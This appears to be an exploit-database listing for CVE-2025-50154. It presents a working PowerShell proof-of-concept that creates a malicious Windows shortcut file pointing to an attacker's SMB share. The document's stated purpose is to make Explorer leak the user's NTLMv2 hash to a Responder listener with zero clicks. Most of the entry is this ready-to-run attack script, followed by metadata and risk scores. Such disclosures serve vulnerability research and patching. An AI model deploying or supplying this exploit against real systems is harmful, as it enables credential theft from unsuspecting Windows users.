Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure

🗓️ 18 Aug 2025 00:00:00Reported by Ruben EnkaouaType

exploitdb🔗 www.exploit-db.com👁 267 Views

Windows 10.0.19045 NTLMv2 hash disclosure via LNK to SMB; CVE-2025-50154 patch bypass.

Reporter	Title	Published	Views	Family All 126
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	14 Jun 202506:46	–	githubexploit
GithubExploit	Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft	5 Jul 202509:22	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	1 Apr 202621:11	–	githubexploit
GithubExploit	Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft	13 Aug 202505:40	–	githubexploit
GithubExploit	Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft	27 Mar 202514:36	–	githubexploit
GithubExploit	Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft	21 Apr 202520:05	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	23 Nov 202513:30	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	9 Nov 202519:48	–	githubexploit
GithubExploit	Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft	13 Aug 202508:16	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	1 May 202605:46	–	githubexploit

# Exploit Title: Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure
# Date: 13/08/2025
# Exploit Author: Ruben Enkaoua
# Author link: https://x.com/RubenLabs, https://github.com/rubenformation
# Original Blog: https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/
# Vendor Homepage: https://microsoft.com
# Software Link: https://www.microsoft.com/en-us/software-download
# Version: All versions prior to patch tuesday august 2025
# Tested on: Windows 10.0.19045
# CVE : CVE-2025-50154
# This exploit if for CVE-2025-24054 Patch Bypass


# Start a responder with:
# responder -I <interface> -v

<#
.SYNOPSIS
    Creates a malicious LNK file that triggers SMB NTLMv2-SSP hash disclosure.
    This code is for educational and research purposes only.
    The author takes no responsibility for any misuse of this code.
.DESCRIPTION
    This script generates a .LNK shortcut pointing to a remote
SMB-hosted binary file.
    The shortcut uses a default Windows icon (SHELL32.dll) but still
forces Explorer to
    fetch the PE icon from the remote binary, triggering authentication.
.PARAMETER path
    Local path where the LNK file will be saved (e.g., C:\Users\User\Desktop).
.PARAMETER ip
    IP address or hostname of the remote SMB server hosting the binary.
.PARAMETER share
    The shared folder on the SMB server where the binary is stored.
.PARAMETER file
    The name of the binary file (e.g., payload.exe).
.EXAMPLE
    .\poc.ps1 -path "C:\Temp" -ip "192.168.1.10" -share "malware"
-file "payload.exe"
#>

param(
    [Parameter(Mandatory=$true)]
    [string]$path,    # -path
    [Parameter(Mandatory=$true)]
    [string]$ip,      # -ip
    [Parameter(Mandatory=$true)]
    [string]$share,   # -share
    [Parameter(Mandatory=$true)]
    [string]$file     # -file
)

# Build file paths
$shortcutPath = Join-Path $path "poc.lnk"
$targetPath = "\\$ip\$share\$file"
$iconLocation = "C:\Windows\System32\SHELL32.dll"

# Create LNK file
$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()

Write-Output "Shortcut created at: $shortcutPath"
Write-Output "Target path: $targetPath"

18 Aug 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.15.4 - 6.5

EPSS0.24268

SSVC